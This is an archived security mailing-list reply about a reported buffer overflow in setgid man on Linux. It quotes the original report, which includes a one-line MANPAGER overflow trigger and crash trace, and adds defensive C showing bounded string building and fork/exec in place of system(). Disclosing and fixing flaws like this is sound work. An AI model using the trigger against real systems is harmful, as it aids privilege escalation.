Hi,

I could not reproduce this on a SuSE 6.2 system running: man, version 2.3.10, db 2.3.1, July 12th, 1995 (G.Wilfordat_private)

My copy is setgid man and I also subjected it to 4, 8, and 20 kb buffers in every environment variable it uses without it flinching.

Michal Zalewski wrote:
>
> With most Linux distributions, /usr/bin/man is shipped as setgid man.
> This setgid bit is required to build formatted manpages in /var/catman for
> faster access. Unfortunately, man does almost everything via system()
> calls, where parameters are user-dependent, and almost always it's
> sprintf'ed before to fixed size buffers. It's kinda trivial to gain man
> privileges, using buffer overflows in environmental variables. For example,
> by specifying MANPAGER variable with approx 4k 'A' letters, you'll get
> SEGV:
>
> $ MANPAGER=`perl -e '{print "A"x4000}'` man ls
>
> [...]
>
> 1200 setuid(500) = 0
> 1200 setgid(15) = 0
> 1200 open("/usr/share/locale/pl/man", O_RDONLY) = -1 ENOENT (No such file or directory)
> 1200 open("/usr/share/locale/pl/LC_MESSAGES/man", O_RDONLY) = -1 ENOENT (No such file or directory)
> 1200 open("/usr/share/locale/pl/man", O_RDONLY) = -1 ENOENT (No such file or directory)
> 1200 open("/usr/share/locale/pl/LC_MESSAGES/man", O_RDONLY) = -1 ENOENT (No such file or directory)
> 1200 close(-1) = -1 EBADF (Bad file descriptor)
> 1200 write(2, "Error executing formatting or display command.\nSystem command (cd /usr/man ; (echo
> 1200 --- SIGSEGV (Naruszenie ochrony pamięci) ---
> 1200 +++ killed by SIGSEGV +++
>
> Program received signal SIGSEGV, Segmentation fault.
> 0x41414141 in ?? ()
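The pattern Michal describes is a setgid binary that sprintf()s an environment variable into a fixed-size buffer and hands the result to system(). The C below is an added illustration for this thread, not code from man or from either poster; the function names (build_pager_cmd, run_pager, rejects_4k_pager) and the 1024-byte buffer size are assumptions. It shows the bounded replacement for the sprintf() call and how running the pager through fork/exec instead of system() keeps /bin/sh out of the picture entirely.

```c
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

#define CMDBUF 1024   /* assumed size of the fixed command buffer */

/* Bounded version of the sprintf(buf, "%s %s", pager, file) that the
 * advisory describes. snprintf() reports how long the string *would* have
 * been, so an oversized $MANPAGER is refused instead of overrunning buf
 * and ending up at 0x41414141. Returns 1 if out[] holds the command. */
int build_pager_cmd(char *out, size_t outsz, const char *pager, const char *file)
{
    int n = snprintf(out, outsz, "%s %s", pager, file);
    if (n < 0 || (size_t)n >= outsz) {
        if (outsz) out[0] = '\0';   /* never hand a partial command onward */
        return 0;
    }
    return 1;
}

/* Defensive check shaped like the advisory's input: a 4000-byte MANPAGER
 * (constructed here) must be rejected by the bounded builder. */
int rejects_4k_pager(void)
{
    char pager[4001], cmd[CMDBUF];
    memset(pager, 'A', 4000);
    pager[4000] = '\0';
    return build_pager_cmd(cmd, sizeof cmd, pager, "/usr/man/cat1/ls.1") == 0;
}

/* Run the pager with fork/execlp rather than system(): the pager name is
 * passed as argv[0] and the file as argv[1], so no shell ever parses the
 * contents of the environment variable. In the child, the setgid "man"
 * group is given up first (setgid to the real gid) so the display step
 * runs with the invoking user's own permissions. Returns the exit status. */
int run_pager(const char *pager, const char *file)
{
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        if (setgid(getgid()) != 0) _exit(127);
        execlp(pager, pager, file, (char *)NULL);
        _exit(127);                 /* exec failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

With a plain setgid() the saved set-group-id is not cleared on every system; a program that must drop the group for good should use the platform's setresgid() or equivalent where available.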
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:37:50 PDT